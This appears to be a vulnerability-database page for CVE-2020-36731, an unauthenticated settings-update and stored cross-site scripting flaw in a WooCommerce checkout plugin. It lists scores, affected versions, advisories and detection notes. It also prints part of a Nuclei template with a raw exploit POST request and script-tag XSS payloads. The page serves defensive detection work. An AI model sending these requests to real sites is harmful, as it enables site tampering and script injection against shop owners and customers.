CVE-2020-36731
published 2023-06-07CVE-2020-36731: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored…
PriorityP179medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.34%
67.8th percentile
The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpdesk | flexible_checkout_fields | <= 2.3.1 | — |
| wpdesk | flexible_checkout_fields_for_woocommerce_woocommerce_checkout_manager | < 2.3.2 | 2.3.2 |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order
commandoption_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments
otherinspire_checkout_fields[settings][order]
- →Unauthenticated POST to /wp-admin/admin.php with page=inspire_checkout_fields_settings and action=update abuses the missing authorization check on updateSettingsAction() hooked via admin_init; no authentication is required to modify plugin settings.
- →Successful exploitation returns the string 'Settings resetted.' in the HTTP response body; use this as a confirmation matcher for the unauthenticated settings-update attack.
- →Stored XSS payload is injected into the inspire_checkout_fields[settings][order] parameter using unsanitized field names containing <script>alert(2)</script>; monitor POST bodies to the settings endpoint for script tags in parameter names.
- →Detection rule matches on co-occurrence of 'order_alert(document.domain)', '[custom_field]', and 'inspire_checkout_fields[settings][order]' in the response, indicating successful stored XSS injection.
- →Content-Type of the malicious POST is application/x-www-form-urlencoded; alert on unauthenticated (no valid WordPress auth cookies) POST requests to wp-admin/admin.php with this content type targeting inspire_checkout_fields_settings.
- ·The vulnerability affects Flexible Checkout Fields for WooCommerce plugin versions up to and including 2.3.1; ensure version scope is confirmed before applying detections to avoid false positives on patched installations. ↗
- ·The attack vector is the admin_init hook, meaning the POST does not require a logged-in session; WAF rules blocking unauthenticated wp-admin access may mitigate this but should be validated against the specific hook behavior. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x5rc-5886-54gw: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to St
ghsa_unreviewed·2023-06-07
CVE-2020-36731 [MEDIUM] CWE-79 GHSA-x5rc-5886-54gw: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to St
The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
VulnCheck
wpdesk flexible_checkout_fields Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 7.2
CVE-2020-36731 [HIGH] wpdesk flexible_checkout_fields Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
wpdesk flexible_checkout_fields Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
Affected: wpdesk flexible_checkout_fields
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/blog/2020/02
No detection rules found.
Nuclei
Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
nuclei·CVSS 6.1
CVE-2020-36731 [MEDIUM] Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
Flexible Checkout Fields for WooCommerce alert(document.domain)_%5D%5Bcustom_field%5D=1
matchers:
- type: word
words:
- "order_alert(document.domain)"
- "[custom_field]"
- "inspire_checkout_fields[settings][order]"
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checko
No writeups or analysis indexed.
https://blog.nintechnet.com/zero-day-vulnerability-fixed-in-wordpress-flexible-checkout-fields-for-woocommerce-plugin/https://www.wordfence.com/blog/2020/02/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities/https://www.wordfence.com/threat-intel/vulnerabilities/id/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cvehttps://blog.nintechnet.com/zero-day-vulnerability-fixed-in-wordpress-flexible-checkout-fields-for-woocommerce-plugin/https://www.wordfence.com/blog/2020/02/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities/https://www.wordfence.com/threat-intel/vulnerabilities/id/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve
2023-06-07
Published
Exploited in the wild